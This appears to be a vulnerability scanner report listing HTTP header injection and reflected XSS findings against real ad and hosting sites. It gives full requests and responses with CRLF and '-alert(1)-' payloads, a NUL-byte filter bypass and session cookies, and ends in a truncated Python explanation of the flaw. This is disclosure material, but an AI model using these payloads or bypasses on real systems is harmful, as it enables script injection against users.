GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=2e03b%0d%0ad348ca74978&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the page request parameter is copied into the Location response header. The payload d57be%0d%0aa073224f42f was submitted in the page parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=ngh&site=PU.NGH.US&origin.page=Hosting&page=d57be%0d%0aa073224f42f&linkOrigin=Hosting&linkId=ngh HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the site request parameter is copied into the Location response header. The payload 6bf4e%0d%0a357848c4060 was submitted in the site parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=6bf4e%0d%0a357848c4060&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the sourcearea request parameter is copied into the Location response header. The payload 29bf0%0d%0ad43926d593f was submitted in the sourcearea parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&origin.page=Hosting&linkId=weiter&site=PU.NGH.US&page=switch&sourcearea=29bf0%0d%0ad43926d593f HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the __lf request parameter is copied into the Location response header. The payload ab024%0d%0acfe55b3b16 was submitted in the __lf parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload e4fdd%0d%0a682e1dc8167 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
The value of the __lf request parameter is copied into the Location response header. The payload 70f82%0d%0ae7e5d5b7eec was submitted in the __lf parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload 1fd04%0d%0a0cd46c6d446 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top1fd04%0d%0a0cd46c6d446&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-home-package-bundle HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 is copied into the Location response header. The payload 41e09%0d%0af4b2c7153f2 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /webde/webde-s/41e09%0d%0af4b2c7153f2?homepage.startseite.pi.home&ns__t=1300646035235&hp_size=1024&hp_country=de&hp_lang=de&hp_portal=webde&hp_userlevel=none&ns_type=view&hp_s_res=1920x1200&hp_s_view=1096x916&ns_c=utf-8&hp_tp=2284&hp_ab=0&ns_jspageurl=http%3a//www.web.de/&ns_ti=web.de+-+e-mail+-+suche+-+dsl+-+de-mail+-+shopping+-+entertainment&ns_referrer=http%3a//www.united-internet.de/deref%3flink%3dhttp%253a%252f%252fwww.web.de%26__sign%3da07b9045963854a3552981589724d9be%26__ts%3d1300644360211 HTTP/1.1 Host: wa.ui-portal.de Proxy-Connection: keep-alive Referer: http://www.web.de/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 20 Mar 2011 18:55:11 GMT Server: Apache Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="http://www.nedstat.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND NAV COM" Set-Cookie: s1=4D864D8F636D0144; expires=Fri, 18-Mar-2016 18:55:11 GMT; path=/webde/webde-s/ Location: http://wa.ui-portal.de/webde/webde-s/41e09 f4b2c7153f2?homepage.startseite.pi.home&ns_m2=yes&ns_setsiteck=4D864D8F636D0144&ns__t=1300646035235&hp_size=1024&hp_country=de&hp_lang=de&hp_portal=webde&hp_userlevel=none&ns_type=view&hp_s_res=1920x1200&hp_s_view=1096x916&ns_c=utf-8&hp_tp=2284&hp_ab=0&ns_jspageurl=http%3a//www.web.de/&ns_ti=web.de+-+e-mail+-+suche+-+dsl+-+de-mail+-+shopping+-+entertainment&ns_referrer=http%3a//www.united-internet.de/deref%3flink%3dhttp%253a%252f%252fwww.web.de%26__sign%3da07b9045963854a3552981589724d9be%26__ts%3d1300644360211 Content-Length: 811 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://wa.ui-portal.de/webde/webde-s/41e09 f4b ...[SNIP]...
4. Cross-site scripting (reflected)
There are 227 instances of this issue:
4.1. http://ad.adtegrity.net/st [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.adtegrity.net
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27220"-alert(1)-"e1de420c95d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=300x250&section=803366&27220"-alert(1)-"e1de420c95d=1 HTTP/1.1 Host: ad.adtegrity.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/300_1_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 17:29:28 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 20 Mar 2011 17:29:28 GMT Pragma: no-cache Content-Length: 4636 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.adtegrity.net/imp?27220"-alert(1)-"e1de420c95d=1&Z=300x250&s=803366&_salt=1378450436";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76d73"-alert(1)-"e256c65c434 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=76d73"-alert(1)-"e256c65c434 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7321 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 14:48:16 GMT Expires: Sun, 20 Mar 2011 14:48:16 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... mh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=76d73"-alert(1)-"e256c65c434http://ads.networksolutions.com/landing?code=P13C519S512N0B2A1D686E0000V100&promo=699DOMAINS"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscr ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a967c"-alert(1)-"3450cf13752 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAEa967c"-alert(1)-"3450cf13752&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=;ord=204549332? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 14:47:44 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 14:47:44 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7363
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 26AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAEa967c"-alert(1)-"3450cf13752&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP13C519S512N0B2A1D686E0000V100%26promo%3D699DOMAINS"); var fsc ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9773"-alert(1)-"7d6db04947d was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065e9773"-alert(1)-"7d6db04947d&adurl=;ord=204549332? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 14:48:14 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 14:48:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7322
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... EtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065e9773"-alert(1)-"7d6db04947d&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP13C519S512N0B2A1D686E0000V100%26promo%3D699DOMAINS"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae102"-alert(1)-"e83e49284e8 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1ae102"-alert(1)-"e83e49284e8&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=;ord=204549332? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 14:47:54 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 14:47:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7322
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... NjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1ae102"-alert(1)-"e83e49284e8&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP13C519S512N0B2A1D686E0000V100%26promo%3D699DOMAINS"); var fscUrl = ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %009d689"-alert(1)-"d3bf0e85614 was submitted in the sig parameter. This input was echoed as 9d689"-alert(1)-"d3bf0e85614 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ%009d689"-alert(1)-"d3bf0e85614&client=ca-pub-6213915329796065&adurl=;ord=204549332? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7292 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 14:48:06 GMT Expires: Sun, 20 Mar 2011 14:48:06 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ%009d689"-alert(1)-"d3bf0e85614&client=ca-pub-6213915329796065&adurl=http://ads.networksolutions.com/landing?code=P61C151S512N0B2A1D687E0000V100&promo=BCXXX03936"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = " ...[SNIP]...
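Every XSS instance in this section lands in the same context: a request value written into a double-quoted JavaScript string such as `rm_url = "..."` or the `url = escape("...")` call in the DoubleClick responses, so a single `"` closes the literal and `-alert(1)-` runs as code. The following is an added example, not code from the report or from the ad servers: it models that template in Python, a character blocklist that a leading NUL defeats in the way the sig-parameter instance describes, and the context-aware encoder that closes both holes. The blocklist and its stop-at-NUL behaviour are an assumption about why %00 works (a C-style length check that never sees the bytes after the NUL, while the output path drops the NUL and writes the rest); the report only records that the bypass succeeds.

```python
"""
Added example (not the ad servers' code): reflected XSS into a JavaScript
string literal, a NUL-bypassable blocklist, and the proper encoding.
"""
import json
import re

BAD = re.compile(r'["<>]')  # assumed blocklist of characters the filter rejects
PREFIX = "http://ad.example/imp?sig="  # assumed URL the value is spliced into


def naive_filter_rejects(value: str) -> bool:
    """Assumed filter: scans for blocked characters, but only up to the first
    NUL, which is what a C strlen()-based check sees. Bytes after it are
    never inspected."""
    visible = value.split("\x00", 1)[0]
    return BAD.search(visible) is not None


def render_vulnerable(param: str) -> str:
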